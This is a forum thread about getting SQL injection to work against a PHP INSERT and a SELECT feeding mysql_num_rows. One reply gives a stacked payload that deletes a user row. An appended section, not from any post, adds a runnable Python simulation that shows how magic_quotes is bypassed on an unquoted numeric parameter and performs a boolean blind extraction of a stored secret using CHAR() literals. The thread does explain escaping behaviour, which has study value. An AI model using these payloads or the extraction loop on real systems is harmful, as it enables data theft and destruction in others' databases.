May 13, 2013 at 1:50 am #8438
I’m having trouble making SQL injection work with an INSERT statement and I’m not sure what I’m doing wrong. The PHP code for the SQL request looks like this:
mysql_query("INSERT INTO txtcomment (id,comment) VALUES ('" . $_POST . "','" . $_POST. "')")
Whenever I try to insert into the comment field, it doesn't seem to work. If I attempt to insert into the ID field, it gives me the error "ERROR: Data truncated for column 'id' at row 1". It does that even if I just add a ' to the id parameter. If I put a character other than a number into the ID field, I get the error "ERROR: Out of range value adjusted for column 'id' at row 1".
When I attempt in the comment field, my whole query goes into the database, special characters and all. There doesn’t seem to be any escaping done in the PHP code, so I can’t tell why I can’t get it to work.
Any obvious mistakes I’m making?
May 13, 2013 at 9:48 am #52948 notsosecure (Participant)
May 13, 2013 at 12:10 pm #52949 caissyd (Participant)
Is your ‘id’ column of type Integer? If it’s the case, your problem is your single quotes.
Change from (having single quotes around the ‘id’ column)
INSERT INTO txtcomment (id,comment) VALUES ('" . $_POST . "','" . $_POST. "')
to (no single quotes)
INSERT INTO txtcomment (id,comment) VALUES (" . $_POST . ",'" . $_POST. "')
You only put single quotes around CHAR, VARCHAR and DATE data types…
Let me know if it works!
May 13, 2013 at 2:37 pm #52950
Thanks for the info, guys. I’m gonna look into it this morning and I’ll post back with the outcome. The ID parameter is an integer, so I don’t know why quotes are around it, but it’s not my code. I’ll try changing the code and testing it to see the results, but I’d also like to get it working with how the code is now, if that’s even possible.
Either way, I’m gonna go at it a few more times this morning and see what I can find.
May 13, 2013 at 3:56 pm #52951
Still no luck. I removed the quotes from the ID parameter in the PHP code to test and was able to use some true/false statements to verify that I could inject, but as soon as I add the single quotes back into the code, it's no go.
Any time I provide anything other than an integer in the ID field, I get the “Data truncated” error. If I try to inject anything into the comment field, it gets put into the DB exactly as I typed it. I don’t see any escaping in the code, but can’t figure out why it won’t work with the single quotes on that field.
On a similar note, is it possible to inject into a query that gets provided to the mysql_num_rows function? I haven't been able to get it working. I have some code like this and am wondering if it's exploitable as well:
$query=mysql_query("SELECT * FROM products WHERE id=" . $id);
$number = mysql_num_rows($query);
Thanks for the help
May 15, 2013 at 12:27 pm #52952 caissyd (Participant)
You know what eyenit0, I suggest you start MySQL Workbench (free!) and try to directly write SQL code there first (without going through PHP code). This way, you will be able to test SQL without the PHP layer.
For example, start with something like this:
INSERT INTO txtcomment (id,comment) VALUES (10, '');
-- Deleting the row containing the username 'bob' from the user table
-- Code to do this is: DELETE FROM user WHERE username='bob'
-- So the injection code would be: comment'); DELETE FROM user WHERE username='bob'; --
-- Note: There is a space at the very end of the SQL injection code!!!
INSERT INTO txtcomment (id,comment) VALUES (10, 'comment'); DELETE FROM user WHERE username='bob'; -- ');
As you can see:
comment'); DELETE FROM user WHERE username='bob'; --
Would be your SQLi code (including the space at the end)
Then, once it works in SQL Workbench, try to do the same thing through PHP. MySQL will often give you more meaningful error messages and you don’t have to worry about PHP…
Does this make sense?
May 15, 2013 at 8:21 pm #52953
Total sense. I should have done that earlier! That helped, along with turning on logging in MySQL to see the queries.
Unfortunately, I realized that magic_quotes is on in PHP (I thought I checked that earlier), so I don't know if this is even exploitable, since the id parameter is quoted. If it weren't, it would be fair game, but I don't see a way out of this one without single quotes.
If I’m missing anything obvious, let me know!
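Added example, not code from any post in this thread: a Python simulation of what the PHP in this thread does to the two parameters, covering both the quoted INSERT from the first post and the unquoted mysql_num_rows query from the later one. It assumes magic_quotes_gpc behaves like addslashes() (backslash-escaping ' " \ and NUL), and uses an in-memory SQLite table with constructed rows as a stand-in for MySQL, so it runs offline; the string building is the point, not the engine. It shows why the quoted id is a dead end once magic_quotes is on (a quote in the id can no longer terminate the literal, so MySQL just sees a non-numeric string headed for an INT column, which is where "Data truncated" comes from), and that the `WHERE id=` . $id query needs no quote at all, so magic_quotes does nothing against it and the row count becomes a boolean oracle. CHAR(n) stands in for string literals in the payload for the same reason. One further caveat on the stacked `; DELETE ...` payload suggested above: PHP's mysql_query() sends a single statement and does not enable multiple statements, so the server rejects the second statement as a syntax error rather than running it; it is a fine test in Workbench, but not something that old PHP API will execute. The table names, column `secret`, and the `hunter2` value are constructed for the example.

```python
import sqlite3


# Stand-in for PHP's magic_quotes_gpc, which ran addslashes() on every
# request value: backslash-escapes ' " \ and NUL.  Assumed to match the
# setting found turned on in the thread.
def addslashes(value: str) -> str:
    out = []
    for ch in value:
        if ch in ("'", '"', "\\"):
            out.append("\\" + ch)
        elif ch == "\x00":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def build_insert(post_id: str, comment: str, magic_quotes: bool) -> str:
    """Same concatenation as the thread's INSERT: id is wrapped in quotes."""
    if magic_quotes:
        post_id, comment = addslashes(post_id), addslashes(comment)
    return ("INSERT INTO txtcomment (id,comment) VALUES ('" + post_id
            + "','" + comment + "')")


def build_select(id_param: str, magic_quotes: bool = True) -> str:
    """Same concatenation as the mysql_num_rows query: id is NOT quoted."""
    if magic_quotes:
        id_param = addslashes(id_param)
    return "SELECT * FROM products WHERE id=" + id_param


def escapes_quoted_literal(value: str) -> bool:
    """True if `value`, placed inside '...', contains a quote that would end
    the literal under MySQL rules (backslash escapes the next char, and ''
    is a literal quote).  False means the injection stays inside the string."""
    i = 0
    while i < len(value):
        if value[i] == "\\":
            i += 2
            continue
        if value[i] == "'":
            if i + 1 < len(value) and value[i + 1] == "'":
                i += 2
                continue
            return True
        i += 1
    return False


# Constructed sample data; SQLite stands in for MySQL so this runs offline.
def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO products VALUES (1, 'widget'), (2, 'gadget');
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, secret TEXT);
        INSERT INTO users VALUES (1, 'admin', 'hunter2');
    """)
    return db


DB = make_db()


def num_rows(id_param: str, magic_quotes: bool = True) -> int:
    """What mysql_num_rows() would report for the thread's SELECT."""
    return len(DB.execute(build_select(id_param, magic_quotes)).fetchall())


ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"


def extract_secret(max_len: int = 32) -> str:
    """Boolean-based blind extraction using only the row count.
    CHAR(n) replaces quoted strings so addslashes() has nothing to escape."""
    found = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            payload = ("1 AND (SELECT SUBSTR(secret,%d,1) FROM users WHERE id=1)"
                       "=CHAR(%d)" % (pos, ord(ch)))
            if num_rows(payload) == 1:
                found += ch
                break
        else:
            break  # nothing matched at this position: end of the secret
    return found


if __name__ == "__main__":
    for mq in (False, True):
        print("magic_quotes=%s: %s" % (mq, build_insert("1'", "hello", mq)))
        print("  quote breaks out of the id literal:",
              escapes_quoted_literal(addslashes("1'") if mq else "1'"))
    print("rows for '1 AND 1=1':", num_rows("1 AND 1=1"))
    print("rows for '1 AND 1=0':", num_rows("1 AND 1=0"))
    print("extracted secret:", extract_secret())
```

The two `build_*` functions are the whole story: the same escaping that keeps `1'` trapped inside `'1\''` in the INSERT has nothing to act on in `WHERE id=1 AND ...`, so the numeric query is exploitable with magic_quotes on exactly as it is with it off, one true/false row count at a time.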
January 4, 2021 at 6:17 am #178488